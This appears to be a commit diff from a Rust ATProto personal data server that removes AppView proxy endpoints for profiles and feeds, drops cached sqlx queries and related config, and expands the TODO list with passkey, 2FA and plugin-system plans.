this repo has no description

Remove a bunch of unnecessary tests & endpoints

lewis f7cc1a3c 3806206d

+6 -18
.env.example
··· 48 # Optional: rotation key for PLC operations (defaults to user's key) 49 # PLC_ROTATION_KEY=did:key:... 50 # ============================================================================= 51 - # AppView Federation 52 # ============================================================================= 53 - # AppViews are resolved via DID-based discovery. Configure by mapping lexicon 54 - # namespaces to AppView DIDs. The DID document is fetched and the service 55 - # endpoint is extracted automatically. 56 - # 57 - # Format: APPVIEW_DID_<NAMESPACE>=<did> 58 - # Where <NAMESPACE> uses underscores instead of dots (e.g., APP_BSKY for app.bsky) 59 - # 60 - # Default: app.bsky and com.atproto -> did:web:api.bsky.app 61 - # 62 - # Examples: 63 - # APPVIEW_DID_APP_BSKY=did:web:api.bsky.app 64 - # APPVIEW_DID_COM_WHTWND=did:web:whtwnd.com 65 - # APPVIEW_DID_BLUE_ZIO=did:plc:some-custom-appview 66 - # 67 - # Cache TTL for resolved AppView endpoints (default: 300 seconds) 68 - # APPVIEW_CACHE_TTL_SECS=300 69 - # 70 # Comma-separated list of relay URLs to notify via requestCrawl 71 # CRAWLERS=https://bsky.network,https://relay.upcloud.world 72 # =============================================================================
··· 48 # Optional: rotation key for PLC operations (defaults to user's key) 49 # PLC_ROTATION_KEY=did:key:... 50 # ============================================================================= 51 + # DID Resolution 52 # ============================================================================= 53 + # Cache TTL for resolved DID documents (default: 300 seconds) 54 + # DID_CACHE_TTL_SECS=300 55 + # ============================================================================= 56 + # Relays 57 + # ============================================================================= 58 # Comma-separated list of relay URLs to notify via requestCrawl 59 # CRAWLERS=https://bsky.network,https://relay.upcloud.world 60 # =============================================================================
-28
.sqlx/query-36001fc127d7a3ea4e53e43a559cd86107e74d02ddcc499afd81049ce3c6789b.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "SELECT key_bytes, encryption_version FROM user_keys k JOIN users u ON k.user_id = u.id WHERE u.did = $1", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "key_bytes", 9 - "type_info": "Bytea" 10 - }, 11 - { 12 - "ordinal": 1, 13 - "name": "encryption_version", 14 - "type_info": "Int4" 15 - } 16 - ], 17 - "parameters": { 18 - "Left": [ 19 - "Text" 20 - ] 21 - }, 22 - "nullable": [ 23 - false, 24 - true 25 - ] 26 - }, 27 - "hash": "36001fc127d7a3ea4e53e43a559cd86107e74d02ddcc499afd81049ce3c6789b" 28 - }
···
-46
.sqlx/query-4bc1e1169d95eac340756b1ba01680caa980514d77cc7b41361c2400f6a5f456.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "SELECT r.record_cid, r.rkey, r.created_at, u.did, u.handle\n FROM records r\n JOIN repos rp ON r.repo_id = rp.user_id\n JOIN users u ON rp.user_id = u.id\n WHERE u.did = ANY($1) AND r.collection = 'app.bsky.feed.post'\n ORDER BY r.created_at DESC\n LIMIT 50", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "record_cid", 9 - "type_info": "Text" 10 - }, 11 - { 12 - "ordinal": 1, 13 - "name": "rkey", 14 - "type_info": "Text" 15 - }, 16 - { 17 - "ordinal": 2, 18 - "name": "created_at", 19 - "type_info": "Timestamptz" 20 - }, 21 - { 22 - "ordinal": 3, 23 - "name": "did", 24 - "type_info": "Text" 25 - }, 26 - { 27 - "ordinal": 4, 28 - "name": "handle", 29 - "type_info": "Text" 30 - } 31 - ], 32 - "parameters": { 33 - "Left": [ 34 - "TextArray" 35 - ] 36 - }, 37 - "nullable": [ 38 - false, 39 - false, 40 - false, 41 - false, 42 - false 43 - ] 44 - }, 45 - "hash": "4bc1e1169d95eac340756b1ba01680caa980514d77cc7b41361c2400f6a5f456" 46 - }
···
-23
.sqlx/query-5f02d646eb60f99f5cc1ae7b8b41e62d053a6b9f8e9452d5cef3526b8aef8288.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "SELECT 1 as val FROM records WHERE repo_id = $1 AND repo_rev <= $2 LIMIT 1", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "val", 9 - "type_info": "Int4" 10 - } 11 - ], 12 - "parameters": { 13 - "Left": [ 14 - "Uuid", 15 - "Text" 16 - ] 17 - }, 18 - "nullable": [ 19 - null 20 - ] 21 - }, 22 - "hash": "5f02d646eb60f99f5cc1ae7b8b41e62d053a6b9f8e9452d5cef3526b8aef8288" 23 - }
···
-22
.sqlx/query-94e290ff1acc15ccb8fd57fce25c7a4eea1e45c7339145d5af2741cc04348c8f.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.actor.profile' AND rkey = 'self'", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "record_cid", 9 - "type_info": "Text" 10 - } 11 - ], 12 - "parameters": { 13 - "Left": [ 14 - "Uuid" 15 - ] 16 - }, 17 - "nullable": [ 18 - false 19 - ] 20 - }, 21 - "hash": "94e290ff1acc15ccb8fd57fce25c7a4eea1e45c7339145d5af2741cc04348c8f" 22 - }
···
-22
.sqlx/query-a3e7b0c0861eaf62dda8b3a2ea5573bbb64eef74473f2b73cb38e2948cb3d7cc.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.graph.follow' LIMIT 5000", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "record_cid", 9 - "type_info": "Text" 10 - } 11 - ], 12 - "parameters": { 13 - "Left": [ 14 - "Uuid" 15 - ] 16 - }, 17 - "nullable": [ 18 - false 19 - ] 20 - }, 21 - "hash": "a3e7b0c0861eaf62dda8b3a2ea5573bbb64eef74473f2b73cb38e2948cb3d7cc" 22 - }
···
-47
.sqlx/query-f3f1634b4f03a4c365afa02c4504de758bc420f49a19092d5cd1c526c7c7461e.json
··· 1 - { 2 - "db_name": "PostgreSQL", 3 - "query": "\n SELECT record_cid, collection, rkey, created_at, repo_rev\n FROM records\n WHERE repo_id = $1 AND repo_rev > $2\n ORDER BY repo_rev ASC\n LIMIT 10\n ", 4 - "describe": { 5 - "columns": [ 6 - { 7 - "ordinal": 0, 8 - "name": "record_cid", 9 - "type_info": "Text" 10 - }, 11 - { 12 - "ordinal": 1, 13 - "name": "collection", 14 - "type_info": "Text" 15 - }, 16 - { 17 - "ordinal": 2, 18 - "name": "rkey", 19 - "type_info": "Text" 20 - }, 21 - { 22 - "ordinal": 3, 23 - "name": "created_at", 24 - "type_info": "Timestamptz" 25 - }, 26 - { 27 - "ordinal": 4, 28 - "name": "repo_rev", 29 - "type_info": "Text" 30 - } 31 - ], 32 - "parameters": { 33 - "Left": [ 34 - "Uuid", 35 - "Text" 36 - ] 37 - }, 38 - "nullable": [ 39 - false, 40 - false, 41 - false, 42 - false, 43 - true 44 - ] 45 - }, 46 - "hash": "f3f1634b4f03a4c365afa02c4504de758bc420f49a19092d5cd1c526c7c7461e" 47 - }
···
+28 -11
TODO.md
··· 38 - [ ] Log all actions with both actor DID and controller DID 39 - [ ] Audit log view for delegated account owners 40 41 - ### Passkey support 42 - Modern passwordless authentication using WebAuthn/FIDO2, alongside or instead of passwords. 43 44 - [ ] passkeys table (id, did, credential_id, public_key, sign_count, created_at, last_used, friendly_name) 45 - - [ ] Generate WebAuthn registration challenge 46 - - [ ] Verify attestation response and store credential 47 - - [ ] UI for registering new passkey from settings 48 - - [ ] Detect if account has passkeys during OAuth authorize 49 - - [ ] Offer passkey option alongside password 50 - - [ ] Generate authentication challenge and verify assertion 51 - - [ ] Update sign count (replay protection) 52 - - [ ] Allow creating account with passkey instead of password 53 - - [ ] List/rename/remove passkeys in settings 54 55 ### Private/encrypted data 56 Records that only authorized parties can see and decrypt. Requires key federation between PDSes. ··· 64 - [ ] Transparent encryption/decryption in repo operations 65 - [ ] Protocol for sharing decryption keys between PDSes 66 - [ ] Handle key rotation and revocation 67 68 --- 69
··· 38 - [ ] Log all actions with both actor DID and controller DID 39 - [ ] Audit log view for delegated account owners 40 41 + ### Passkeys and 2FA 42 + Modern passwordless authentication using WebAuthn/FIDO2, plus TOTP for defense in depth. 43 44 - [ ] passkeys table (id, did, credential_id, public_key, sign_count, created_at, last_used, friendly_name) 45 + - [ ] user_totp table (did, secret_encrypted, verified, created_at, last_used) 46 + - [ ] WebAuthn registration challenge generation and attestation verification 47 + - [ ] TOTP secret generation with QR code setup flow 48 + - [ ] Backup codes (hashed, one-time use) with recovery flow 49 + - [ ] OAuth authorize flow: password → 2FA (if enabled) → passkey (as alternative) 50 + - [ ] Passkey-only account creation (no password) 51 + - [ ] Settings UI for managing passkeys, TOTP, backup codes 52 + - [ ] Trusted devices option (remember this browser) 53 + - [ ] Rate limit 2FA attempts 54 + - [ ] Re-auth for sensitive actions (email change, adding new auth methods) 55 56 ### Private/encrypted data 57 Records that only authorized parties can see and decrypt. Requires key federation between PDSes. ··· 65 - [ ] Transparent encryption/decryption in repo operations 66 - [ ] Protocol for sharing decryption keys between PDSes 67 - [ ] Handle key rotation and revocation 68 + 69 + ### Plugin system 70 + Extensible architecture allowing third-party plugins to add functionality, like minecraft mods or browser extensions. 71 + 72 + - [ ] Research: survey Fabric/Forge, VS Code, Grafana, Caddy plugin architectures 73 + - [ ] Evaluate rust approaches: WASM, dynamic linking, subprocess IPC, embedded scripting (Lua/Rhai) 74 + - [ ] Define security model (sandboxing, permissions, resource limits) 75 + - [ ] Plugin manifest format (name, version, deps, permissions, hooks) 76 + - [ ] Plugin discovery, loading, lifecycle (enable/disable/hot reload) 77 + - [ ] Error isolation (bad plugin shouldn't crash PDS) 78 + - [ ] Extension points: request middleware, record lifecycle hooks, custom XRPC endpoints 79 + - [ ] Extension points: custom lexicons, storage backends, auth providers, notification channels 80 + - [ ] Extension points: firehose consumers (react to repo events) 81 + - [ ] Plugin SDK crate with traits and helpers 82 + - [ ] Example plugins: custom feed algorithm, content filter, S3 backup 83 + - [ ] Plugin registry with signature verification and version compatibility 84 85 --- 86
-2
src/api/actor/mod.rs
··· 1 mod preferences; 2 - mod profile; 3 4 pub use preferences::{get_preferences, put_preferences}; 5 - pub use profile::{get_profile, get_profiles};
··· 1 mod preferences; 2 3 pub use preferences::{get_preferences, put_preferences};
-290
src/api/actor/profile.rs
··· 1 - use crate::api::proxy_client::proxy_client; 2 - use crate::state::AppState; 3 - use axum::{ 4 - Json, 5 - extract::{Query, RawQuery, State}, 6 - http::StatusCode, 7 - response::{IntoResponse, Response}, 8 - }; 9 - use jacquard_repo::storage::BlockStore; 10 - use serde::{Deserialize, Serialize}; 11 - use serde_json::{Value, json}; 12 - use std::collections::HashMap; 13 - use tracing::{error, info}; 14 - 15 - #[derive(Deserialize)] 16 - pub struct GetProfileParams { 17 - pub actor: String, 18 - } 19 - 20 - #[derive(Serialize, Deserialize, Clone)] 21 - #[serde(rename_all = "camelCase")] 22 - pub struct ProfileViewDetailed { 23 - pub did: String, 24 - pub handle: String, 25 - #[serde(skip_serializing_if = "Option::is_none")] 26 - pub display_name: Option<String>, 27 - #[serde(skip_serializing_if = "Option::is_none")] 28 - pub description: Option<String>, 29 - #[serde(skip_serializing_if = "Option::is_none")] 30 - pub avatar: Option<String>, 31 - #[serde(skip_serializing_if = "Option::is_none")] 32 - pub banner: Option<String>, 33 - #[serde(flatten)] 34 - pub extra: HashMap<String, Value>, 35 - } 36 - 37 - #[derive(Serialize, Deserialize)] 38 - pub struct GetProfilesOutput { 39 - pub profiles: Vec<ProfileViewDetailed>, 40 - } 41 - 42 - async fn get_local_profile_record(state: &AppState, did: &str) -> Option<Value> { 43 - let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 44 - .fetch_optional(&state.db) 45 - .await 46 - .ok()??; 47 - let record_row = sqlx::query!( 48 - "SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.actor.profile' AND rkey = 'self'", 49 - user_id 50 - ) 51 - .fetch_optional(&state.db) 52 - .await 53 - .ok()??; 54 - let cid: cid::Cid = record_row.record_cid.parse().ok()?; 55 - let block_bytes = state.block_store.get(&cid).await.ok()??; 56 - serde_ipld_dagcbor::from_slice(&block_bytes).ok() 57 - } 58 - 59 - fn munge_profile_with_local(profile: &mut ProfileViewDetailed, local_record: &Value) { 60 - if let Some(display_name) = local_record.get("displayName").and_then(|v| v.as_str()) { 61 - profile.display_name = Some(display_name.to_string()); 62 - } 63 - if let Some(description) = local_record.get("description").and_then(|v| v.as_str()) { 64 - profile.description = Some(description.to_string()); 65 - } 66 - } 67 - 68 - async fn proxy_to_appview( 69 - state: &AppState, 70 - method: &str, 71 - params: &HashMap<String, String>, 72 - auth_did: &str, 73 - auth_key_bytes: Option<&[u8]>, 74 - ) -> Result<(StatusCode, Value), Response> { 75 - let resolved = match state.appview_registry.get_appview_for_method(method).await { 76 - Some(r) => r, 77 - None => { 78 - return Err(( 79 - StatusCode::BAD_GATEWAY, 80 - Json( 81 - json!({"error": "UpstreamError", "message": "No upstream AppView configured"}), 82 - ), 83 - ) 84 - .into_response()); 85 - } 86 - }; 87 - let target_url = format!("{}/xrpc/{}", resolved.url, method); 88 - info!("Proxying GET request to {}", target_url); 89 - let client = proxy_client(); 90 - let request_builder = client.get(&target_url).query(params); 91 - proxy_request(request_builder, auth_did, auth_key_bytes, method, &resolved.did).await 92 - } 93 - 94 - async fn proxy_to_appview_raw( 95 - state: &AppState, 96 - method: &str, 97 - raw_query: Option<&str>, 98 - auth_did: &str, 99 - auth_key_bytes: Option<&[u8]>, 100 - ) -> Result<(StatusCode, Value), Response> { 101 - let resolved = match state.appview_registry.get_appview_for_method(method).await { 102 - Some(r) => r, 103 - None => { 104 - return Err(( 105 - StatusCode::BAD_GATEWAY, 106 - Json( 107 - json!({"error": "UpstreamError", "message": "No upstream AppView configured"}), 108 - ), 109 - ) 110 - .into_response()); 111 - } 112 - }; 113 - let target_url = match raw_query { 114 - Some(q) => format!("{}/xrpc/{}?{}", resolved.url, method, q), 115 - None => format!("{}/xrpc/{}", resolved.url, method), 116 - }; 117 - info!("Proxying GET request to {}", target_url); 118 - let client = proxy_client(); 119 - let request_builder = client.get(&target_url); 120 - proxy_request(request_builder, auth_did, auth_key_bytes, method, &resolved.did).await 121 - } 122 - 123 - async fn proxy_request( 124 - mut request_builder: reqwest::RequestBuilder, 125 - auth_did: &str, 126 - auth_key_bytes: Option<&[u8]>, 127 - method: &str, 128 - appview_did: &str, 129 - ) -> Result<(StatusCode, Value), Response> { 130 - if let Some(key_bytes) = auth_key_bytes { 131 - match crate::auth::create_service_token(auth_did, appview_did, method, key_bytes) { 132 - Ok(service_token) => { 133 - request_builder = 134 - request_builder.header("Authorization", format!("Bearer {}", service_token)); 135 - } 136 - Err(e) => { 137 - error!("Failed to create service token: {:?}", e); 138 - return Err(( 139 - StatusCode::INTERNAL_SERVER_ERROR, 140 - Json(json!({"error": "InternalError"})), 141 - ) 142 - .into_response()); 143 - } 144 - } 145 - } 146 - match request_builder.send().await { 147 - Ok(resp) => { 148 - let status = 149 - StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY); 150 - match resp.json::<Value>().await { 151 - Ok(body) => Ok((status, body)), 152 - Err(e) => { 153 - error!("Error parsing proxy response: {:?}", e); 154 - Err(( 155 - StatusCode::BAD_GATEWAY, 156 - Json(json!({"error": "UpstreamError"})), 157 - ) 158 - .into_response()) 159 - } 160 - } 161 - } 162 - Err(e) => { 163 - error!("Error sending proxy request: {:?}", e); 164 - if e.is_timeout() { 165 - Err(( 166 - StatusCode::GATEWAY_TIMEOUT, 167 - Json(json!({"error": "UpstreamTimeout"})), 168 - ) 169 - .into_response()) 170 - } else { 171 - Err(( 172 - StatusCode::BAD_GATEWAY, 173 - Json(json!({"error": "UpstreamError"})), 174 - ) 175 - .into_response()) 176 - } 177 - } 178 - } 179 - } 180 - 181 - pub async fn get_profile( 182 - State(state): State<AppState>, 183 - headers: axum::http::HeaderMap, 184 - Query(params): Query<GetProfileParams>, 185 - ) -> Response { 186 - let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok()); 187 - let auth_user = if let Some(h) = auth_header { 188 - if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) { 189 - crate::auth::validate_bearer_token(&state.db, &token) 190 - .await 191 - .ok() 192 - } else { 193 - None 194 - } 195 - } else { 196 - None 197 - }; 198 - let auth_did = auth_user.as_ref().map(|u| u.did.clone()); 199 - let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone()); 200 - let mut query_params = HashMap::new(); 201 - query_params.insert("actor".to_string(), params.actor.clone()); 202 - let (status, body) = match proxy_to_appview( 203 - &state, 204 - "app.bsky.actor.getProfile", 205 - &query_params, 206 - auth_did.as_deref().unwrap_or(""), 207 - auth_key_bytes.as_deref(), 208 - ) 209 - .await 210 - { 211 - Ok(r) => r, 212 - Err(e) => return e, 213 - }; 214 - if !status.is_success() { 215 - return (status, Json(body)).into_response(); 216 - } 217 - let mut profile: ProfileViewDetailed = match serde_json::from_value(body) { 218 - Ok(p) => p, 219 - Err(_) => { 220 - return ( 221 - StatusCode::BAD_GATEWAY, 222 - Json(json!({"error": "UpstreamError", "message": "Invalid profile response"})), 223 - ) 224 - .into_response(); 225 - } 226 - }; 227 - if let Some(ref did) = auth_did 228 - && profile.did == *did 229 - && let Some(local_record) = get_local_profile_record(&state, did).await { 230 - munge_profile_with_local(&mut profile, &local_record); 231 - } 232 - (StatusCode::OK, Json(profile)).into_response() 233 - } 234 - 235 - pub async fn get_profiles( 236 - State(state): State<AppState>, 237 - headers: axum::http::HeaderMap, 238 - RawQuery(raw_query): RawQuery, 239 - ) -> Response { 240 - let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok()); 241 - let auth_user = if let Some(h) = auth_header { 242 - if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) { 243 - crate::auth::validate_bearer_token(&state.db, &token) 244 - .await 245 - .ok() 246 - } else { 247 - None 248 - } 249 - } else { 250 - None 251 - }; 252 - let auth_did = auth_user.as_ref().map(|u| u.did.clone()); 253 - let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone()); 254 - let (status, body) = match proxy_to_appview_raw( 255 - &state, 256 - "app.bsky.actor.getProfiles", 257 - raw_query.as_deref(), 258 - auth_did.as_deref().unwrap_or(""), 259 - auth_key_bytes.as_deref(), 260 - ) 261 - .await 262 - { 263 - Ok(r) => r, 264 - Err(e) => return e, 265 - }; 266 - if !status.is_success() { 267 - return (status, Json(body)).into_response(); 268 - } 269 - let mut output: GetProfilesOutput = match serde_json::from_value(body) { 270 - Ok(p) => p, 271 - Err(_) => { 272 - return ( 273 - StatusCode::BAD_GATEWAY, 274 - Json(json!({"error": "UpstreamError", "message": "Invalid profiles response"})), 275 - ) 276 - .into_response(); 277 - } 278 - }; 279 - if let Some(ref did) = auth_did { 280 - for profile in &mut output.profiles { 281 - if profile.did == *did { 282 - if let Some(local_record) = get_local_profile_record(&state, did).await { 283 - munge_profile_with_local(profile, &local_record); 284 - } 285 - break; 286 - } 287 - } 288 - } 289 - (StatusCode::OK, Json(output)).into_response() 290 - }
···
-158
src/api/feed/actor_likes.rs
··· 1 - use crate::api::read_after_write::{ 2 - FeedOutput, FeedViewPost, LikeRecord, PostView, RecordDescript, extract_repo_rev, 3 - format_munged_response, get_local_lag, get_records_since_rev, proxy_to_appview_via_registry, 4 - }; 5 - use crate::state::AppState; 6 - use axum::{ 7 - Json, 8 - extract::{Query, State}, 9 - http::StatusCode, 10 - response::{IntoResponse, Response}, 11 - }; 12 - use serde::Deserialize; 13 - use serde_json::Value; 14 - use std::collections::HashMap; 15 - use tracing::warn; 16 - 17 - #[derive(Deserialize)] 18 - pub struct GetActorLikesParams { 19 - pub actor: String, 20 - pub limit: Option<u32>, 21 - pub cursor: Option<String>, 22 - } 23 - 24 - fn insert_likes_into_feed(feed: &mut Vec<FeedViewPost>, likes: &[RecordDescript<LikeRecord>]) { 25 - for like in likes { 26 - let like_time = &like.indexed_at.to_rfc3339(); 27 - let idx = feed 28 - .iter() 29 - .position(|fi| &fi.post.indexed_at < like_time) 30 - .unwrap_or(feed.len()); 31 - let placeholder_post = PostView { 32 - uri: like.record.subject.uri.clone(), 33 - cid: like.record.subject.cid.clone(), 34 - author: crate::api::read_after_write::AuthorView { 35 - did: String::new(), 36 - handle: String::new(), 37 - display_name: None, 38 - avatar: None, 39 - extra: HashMap::new(), 40 - }, 41 - record: Value::Null, 42 - indexed_at: like.indexed_at.to_rfc3339(), 43 - embed: None, 44 - reply_count: 0, 45 - repost_count: 0, 46 - like_count: 0, 47 - quote_count: 0, 48 - extra: HashMap::new(), 49 - }; 50 - feed.insert( 51 - idx, 52 - FeedViewPost { 53 - post: placeholder_post, 54 - reply: None, 55 - reason: None, 56 - feed_context: None, 57 - extra: HashMap::new(), 58 - }, 59 - ); 60 - } 61 - } 62 - 63 - pub async fn get_actor_likes( 64 - State(state): State<AppState>, 65 - headers: axum::http::HeaderMap, 66 - Query(params): Query<GetActorLikesParams>, 67 - ) -> Response { 68 - let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok()); 69 - let auth_user = if let Some(h) = auth_header { 70 - if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) { 71 - crate::auth::validate_bearer_token(&state.db, &token) 72 - .await 73 - .ok() 74 - } else { 75 - None 76 - } 77 - } else { 78 - None 79 - }; 80 - let auth_did = auth_user.as_ref().map(|u| u.did.clone()); 81 - let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone()); 82 - let mut query_params = HashMap::new(); 83 - query_params.insert("actor".to_string(), params.actor.clone()); 84 - if let Some(limit) = params.limit { 85 - query_params.insert("limit".to_string(), limit.to_string()); 86 - } 87 - if let Some(cursor) = &params.cursor { 88 - query_params.insert("cursor".to_string(), cursor.clone()); 89 - } 90 - let proxy_result = match proxy_to_appview_via_registry( 91 - &state, 92 - "app.bsky.feed.getActorLikes", 93 - &query_params, 94 - auth_did.as_deref().unwrap_or(""), 95 - auth_key_bytes.as_deref(), 96 - ) 97 - .await 98 - { 99 - Ok(r) => r, 100 - Err(e) => return e, 101 - }; 102 - if !proxy_result.status.is_success() { 103 - return proxy_result.into_response(); 104 - } 105 - let rev = match extract_repo_rev(&proxy_result.headers) { 106 - Some(r) => r, 107 - None => return proxy_result.into_response(), 108 - }; 109 - let mut feed_output: FeedOutput = match serde_json::from_slice(&proxy_result.body) { 110 - Ok(f) => f, 111 - Err(e) => { 112 - warn!("Failed to parse actor likes response: {:?}", e); 113 - return proxy_result.into_response(); 114 - } 115 - }; 116 - let requester_did = match &auth_did { 117 - Some(d) => d.clone(), 118 - None => return (StatusCode::OK, Json(feed_output)).into_response(), 119 - }; 120 - let actor_did = if params.actor.starts_with("did:") { 121 - params.actor.clone() 122 - } else { 123 - let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 124 - let suffix = format!(".{}", hostname); 125 - let short_handle = if params.actor.ends_with(&suffix) { 126 - params.actor.strip_suffix(&suffix).unwrap_or(&params.actor) 127 - } else { 128 - &params.actor 129 - }; 130 - match sqlx::query_scalar!("SELECT did FROM users WHERE handle = $1", short_handle) 131 - .fetch_optional(&state.db) 132 - .await 133 - { 134 - Ok(Some(did)) => did, 135 - Ok(None) => return (StatusCode::OK, Json(feed_output)).into_response(), 136 - Err(e) => { 137 - warn!("Database error resolving actor handle: {:?}", e); 138 - return proxy_result.into_response(); 139 - } 140 - } 141 - }; 142 - if actor_did != requester_did { 143 - return (StatusCode::OK, Json(feed_output)).into_response(); 144 - } 145 - let local_records = match get_records_since_rev(&state, &requester_did, &rev).await { 146 - Ok(r) => r, 147 - Err(e) => { 148 - warn!("Failed to get local records: {}", e); 149 - return proxy_result.into_response(); 150 - } 151 - }; 152 - if local_records.likes.is_empty() { 153 - return (StatusCode::OK, Json(feed_output)).into_response(); 154 - } 155 - insert_likes_into_feed(&mut feed_output.feed, &local_records.likes); 156 - let lag = get_local_lag(&local_records); 157 - format_munged_response(feed_output, lag) 158 - }
···
-160
src/api/feed/author_feed.rs
··· 1 - use crate::api::read_after_write::{ 2 - FeedOutput, FeedViewPost, ProfileRecord, RecordDescript, extract_repo_rev, format_local_post, 3 - format_munged_response, get_local_lag, get_records_since_rev, insert_posts_into_feed, 4 - proxy_to_appview_via_registry, 5 - }; 6 - use crate::state::AppState; 7 - use axum::{ 8 - Json, 9 - extract::{Query, State}, 10 - http::StatusCode, 11 - response::{IntoResponse, Response}, 12 - }; 13 - use serde::Deserialize; 14 - use std::collections::HashMap; 15 - use tracing::warn; 16 - 17 - #[derive(Deserialize)] 18 - pub struct GetAuthorFeedParams { 19 - pub actor: String, 20 - pub limit: Option<u32>, 21 - pub cursor: Option<String>, 22 - pub filter: Option<String>, 23 - #[serde(rename = "includePins")] 24 - pub include_pins: Option<bool>, 25 - } 26 - 27 - fn update_author_profile_in_feed( 28 - feed: &mut [FeedViewPost], 29 - author_did: &str, 30 - local_profile: &RecordDescript<ProfileRecord>, 31 - ) { 32 - for item in feed.iter_mut() { 33 - if item.post.author.did == author_did 34 - && let Some(ref display_name) = local_profile.record.display_name { 35 - item.post.author.display_name = Some(display_name.clone()); 36 - } 37 - } 38 - } 39 - 40 - pub async fn get_author_feed( 41 - State(state): State<AppState>, 42 - headers: axum::http::HeaderMap, 43 - Query(params): Query<GetAuthorFeedParams>, 44 - ) -> Response { 45 - let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok()); 46 - let auth_user = if let Some(h) = auth_header { 47 - if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) { 48 - crate::auth::validate_bearer_token(&state.db, &token) 49 - .await 50 - .ok() 51 - } else { 52 - None 53 - } 54 - } else { 55 - None 56 - }; 57 - let auth_did = auth_user.as_ref().map(|u| u.did.clone()); 58 - let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone()); 59 - let mut query_params = HashMap::new(); 60 - query_params.insert("actor".to_string(), params.actor.clone()); 61 - if let Some(limit) = params.limit { 62 - query_params.insert("limit".to_string(), limit.to_string()); 63 - } 64 - if let Some(cursor) = &params.cursor { 65 - query_params.insert("cursor".to_string(), cursor.clone()); 66 - } 67 - if let Some(filter) = &params.filter { 68 - query_params.insert("filter".to_string(), filter.clone()); 69 - } 70 - if let Some(include_pins) = params.include_pins { 71 - query_params.insert("includePins".to_string(), include_pins.to_string()); 72 - } 73 - let proxy_result = match proxy_to_appview_via_registry( 74 - &state, 75 - "app.bsky.feed.getAuthorFeed", 76 - &query_params, 77 - auth_did.as_deref().unwrap_or(""), 78 - auth_key_bytes.as_deref(), 79 - ) 80 - .await 81 - { 82 - Ok(r) => r, 83 - Err(e) => return e, 84 - }; 85 - if !proxy_result.status.is_success() { 86 - return proxy_result.into_response(); 87 - } 88 - let rev = match extract_repo_rev(&proxy_result.headers) { 89 - Some(r) => r, 90 - None => return proxy_result.into_response(), 91 - }; 92 - let mut feed_output: FeedOutput = match serde_json::from_slice(&proxy_result.body) { 93 - Ok(f) => f, 94 - Err(e) => { 95 - warn!("Failed to parse author feed response: {:?}", e); 96 - return proxy_result.into_response(); 97 - } 98 - }; 99 - let requester_did = match &auth_did { 100 - Some(d) => d.clone(), 101 - None => return (StatusCode::OK, Json(feed_output)).into_response(), 102 - }; 103 - let actor_did = if params.actor.starts_with("did:") { 104 - params.actor.clone() 105 - } else { 106 - let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 107 - let suffix = format!(".{}", hostname); 108 - let short_handle = if params.actor.ends_with(&suffix) { 109 - params.actor.strip_suffix(&suffix).unwrap_or(&params.actor) 110 - } else { 111 - &params.actor 112 - }; 113 - match sqlx::query_scalar!("SELECT did FROM users WHERE handle = $1", short_handle) 114 - .fetch_optional(&state.db) 115 - .await 116 - { 117 - Ok(Some(did)) => did, 118 - Ok(None) => return (StatusCode::OK, Json(feed_output)).into_response(), 119 - Err(e) => { 120 - warn!("Database error resolving actor handle: {:?}", e); 121 - return proxy_result.into_response(); 122 - } 123 - } 124 - }; 125 - if actor_did != requester_did { 126 - return (StatusCode::OK, Json(feed_output)).into_response(); 127 - } 128 - let local_records = match get_records_since_rev(&state, &requester_did, &rev).await { 129 - Ok(r) => r, 130 - Err(e) => { 131 - warn!("Failed to get local records: {}", e); 132 - return proxy_result.into_response(); 133 - } 134 - }; 135 - if local_records.count == 0 { 136 - return (StatusCode::OK, Json(feed_output)).into_response(); 137 - } 138 - let handle = match sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", requester_did) 139 - .fetch_optional(&state.db) 140 - .await 141 - { 142 - Ok(Some(h)) => h, 143 - Ok(None) => requester_did.clone(), 144 - Err(e) => { 145 - warn!("Database error fetching handle: {:?}", e); 146 - requester_did.clone() 147 - } 148 - }; 149 - if let Some(ref local_profile) = local_records.profile { 150 - update_author_profile_in_feed(&mut feed_output.feed, &requester_did, local_profile); 151 - } 152 - let local_posts: Vec<_> = local_records 153 - .posts 154 - .iter() 155 - .map(|p| format_local_post(p, &requester_did, &handle, local_records.profile.as_ref())) 156 - .collect(); 157 - insert_posts_into_feed(&mut feed_output.feed, local_posts); 158 - let lag = get_local_lag(&local_records); 159 - format_munged_response(feed_output, lag) 160 - }
···
-131
src/api/feed/custom_feed.rs
